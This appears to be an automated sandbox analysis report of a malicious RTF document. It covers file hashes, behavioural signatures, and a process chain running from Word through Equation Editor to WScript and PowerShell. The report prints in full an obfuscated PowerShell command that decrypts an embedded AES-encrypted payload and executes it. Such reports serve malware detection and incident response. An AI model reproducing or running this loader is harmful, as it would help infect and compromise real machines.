Analysis
-
max time kernel
130s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
30-07-2024 10:03
Static task
static1
Behavioral task
behavioral1
Sample
heistheheroofnewthingstogetmebackwithentirethingstogetbackunderstarndeverytingbetterwithworkingmodel.rtf
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
heistheheroofnewthingstogetmebackwithentirethingstogetbackunderstarndeverytingbetterwithworkingmodel.rtf
Resource
win10v2004-20240709-en
General
-
Target
heistheheroofnewthingstogetmebackwithentirethingstogetbackunderstarndeverytingbetterwithworkingmodel.rtf
-
Size
94KB
-
MD5
f7c34c11bb5d9cdcece78edae0beff42
-
SHA1
96f2510fbb5c6203e21ead4dd55daaab59a86f4e
-
SHA256
112181241c7cb66758507fdce08e40069efa3e82bedb39eb98c833e5291109d3
-
SHA512
9b733c0d88c98adfe48e45079276ff7e059540445aa576b9eb637ac5c6881586336740384d71ab8a98e24b6f13c76d2ad88dd4437077dabd6a8d7829cd037164
-
SSDEEP
768:GS6MQ5k2WKcczrYFUoNVEbHfwFclPY49Ug+:tSWKccXYtclPYaA
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
EQNEDT32.EXEpowershell.exeflow pid process 4 2092 EQNEDT32.EXE 5 2768 powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
WINWORD.EXEEQNEDT32.EXEWScript.exepowershell.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 2504 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2768 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2768 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 2504 WINWORD.EXE 2504 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
EQNEDT32.EXEWScript.exeWINWORD.EXEdescription pid process target process PID 2092 wrote to memory of 2872 2092 EQNEDT32.EXE WScript.exe PID 2092 wrote to memory of 2872 2092 EQNEDT32.EXE WScript.exe PID 2092 wrote to memory of 2872 2092 EQNEDT32.EXE WScript.exe PID 2092 wrote to memory of 2872 2092 EQNEDT32.EXE WScript.exe PID 2872 wrote to memory of 2768 2872 WScript.exe powershell.exe PID 2872 wrote to memory of 2768 2872 WScript.exe powershell.exe PID 2872 wrote to memory of 2768 2872 WScript.exe powershell.exe PID 2872 wrote to memory of 2768 2872 WScript.exe powershell.exe PID 2504 wrote to memory of 2108 2504 WINWORD.EXE splwow64.exe PID 2504 wrote to memory of 2108 2504 WINWORD.EXE splwow64.exe PID 2504 wrote to memory of 2108 2504 WINWORD.EXE splwow64.exe PID 2504 wrote to memory of 2108 2504 WINWORD.EXE splwow64.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\heistheheroofnewthingstogetmebackwithentirethingstogetbackunderstarndeverytingbetterwithworkingmodel.rtf"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2108
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemsitsgreattoreleasethedargon.vBS"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI78788979119683530985530790090406CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIxnPEzukRsRmzojEc2IqrsP6SzVylf4Lg1SsmmstVoJpV85MKYUwolNJkrLCOU5mJEMqMV+12DiEJ79pZ9yIaWkX01VWnCHXhB3HYMrMthz9dx3qVZG5quEhCgfQ6Zph6Ax6Lf4RH+PZR7dkdCwyLFaWfarqe/MQK49YgyXHqf8xybMvrfjAGQmSb8+3rz+o3mw40bVJxQ6m8tQdAkw6sCVRflXiNsvVPXd9z2Xi0ad/BdcF037OL0GwjtXRs4HTNhF7nzo4Ed5q/h3dLLIMSn2J+w2IWk+U5mgaGh75IlTQeR4SwCUwM45ySFmY56HoQ3vHGf2N49OpVzffLKifgubFQg5jD8FvJXO8aoVjOSTJCW69aOoGZTyK5J0HIGG5gJvjVmBk6igl+L+8yDRg781ddUNbUdYL922Qeo/CBrATzZ7nIcK64Yvri5jOiE57sC7hW5qPZlABLBL4Es2RDH83nRO7hflBwRplmsQrhQE08BcAtC5/H/dUM/kvdtXeeOX8Tuu7lESLHAr56TF9GhVOHA8prMr/tS2ZR0hyZfm7Bu3Tmdu+x2fwwzem8z+mBAmD/XKsxM6sTzoC3n1Ae0JVe73Zercxs+BmJJpbgXjZ+Q9u57NNqoS6U2CdC72jMJxHKDE4+VSNlWGl5O7OlHVD7o3Qsvf69qB0gqacfvTobcTSWza0EJF9kQ+5z3ZIN4RDUiT7O+w3Uqio7O7mnXWYIN/7LtXn62LFIRF3KVPy/5e+G9c8TEWAjIuK16XOWGMdYryMqIXHJ3DJ7W8AUmlfwhUaV8fAeSoTOsK9/b9nBvoFbAx5+hsd0hyHmpInkBC2DS/badEfD6PQJYrYcjkbGi0RoNniC2jHpPPdWIvIlnj2s8yLFbY35KLplcF4i3yVyXJ5kbYsqU3WF61Q38O8XXyiS2NXcTWzwb8zvTWXKUc8sjaWjj35wSYokblJCUj2oyo2B867XR0zuJ5ksaLRPpHeo9i8gtJ0FS5wmJ0XoFxiBz5+4fqoH7wQvJCQRXOb6f27I25twnb2ObtgolO3WOhl0izHAioF+1H3wM0sVxYtpu5z57tcag6+v30kNNbaBzxG+tzD5ToOrfi6Tce9xTGxoPOyFIIJJOJZGzdk4+HSKzeN9fZHZQXV8aKZDPujY3w9+PjqbvvKoSuY4psjbQuBgyGcFtkTHImmPuptN8Olz+SkUIa6Kcui5IEhw705+l8XTPBh3pewFIhVmN03zvUALvhifDR5gzFw3dgrcWS3k5q6w+21FcfYm4h9Rwx8pqfh5aEbMHkAsAhUbfwnDKj0Bzvd7b6h/aeqdx4BtT4PyDGMyDSZHQqQUtx5o2A/sy7aoFXDUGZw3QV3NebZhx2Lzm6xnxF43aMw22YC8GLh2Dks7+J5AnS+B3cZu3E5Mr1FIaQ/ekLxwOA/T8A==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2768
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
403KB
MD51e06a0b540d76abb6e2712fa7e37138a
SHA11e7a793fe2bcd27f2757969043cdf5f5231e977e
SHA2567d9be9418bca7c307c7fed9ab4ad56058363ee8ad59ae401cfdbcbea7ff252e9
SHA5122b7cde726ee68b9d1cfa24c4413ebf5ab9f026b758d7cc4b6d9c6ad4eaf4b626abdde06e55d529ff2092e06f16dc8f86df935db118727733b1cd6c7284a5184a